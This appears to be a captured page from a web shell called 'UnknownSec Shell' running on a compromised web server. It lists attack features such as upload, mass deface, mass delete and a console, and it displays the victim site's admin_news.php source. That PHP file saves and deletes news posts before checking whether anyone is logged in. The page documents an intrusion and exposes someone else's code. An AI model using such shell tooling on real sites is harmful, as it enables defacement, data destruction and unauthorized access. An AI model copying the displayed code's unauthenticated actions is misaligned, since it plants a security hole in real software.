shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
admin_news.php
<?php include('ini.php'); $Template = new Template; $News = new News; $error = false; if ($_POST['submitBut'] == 'Save'){ if ($_POST['dispTitle'] == '' || $_POST['message'] == ''){ $error = true; } else { $dispTitle = htmlentities($_POST['dispTitle'], ENT_QUOTES); $News->add_mod($_POST['newsID'], $dispTitle, $_POST['message'], $_POST['xAttach'], $_POST['link']); } } else if ($_POST['submitBut'] == 'Confirm Delete'){ $News->delete($_POST['newsID']); } include('includes/admin_header.php'); $Template = new Template; echo $Template->get_alerts('error'); echo $Template->get_alerts('success'); echo $Template->get_alerts('error'); echo $Template->get_alerts('success'); if ($_SESSION['LID'] > 0){ // display views ===================== if ($_POST['submitBut'] == 'Add Post' || $_POST['submitBut'] == 'Edit' || ($_POST['submitBut'] == 'Save' && $error == true)){ $Template->load('views/v_admin_news_edit.php'); } else if ($_POST['submitBut'] == 'Delete'){ $Template->load('views/v_admin_news_del.php'); } else { $Template->load('views/v_admin_news.php'); } } else { echo "<div class='col-12 centre'>Please <a href='cms_login.php'>login</a>.</div>"; } include('includes/admin_footer.php'); ?>
© 2026 UnknownSec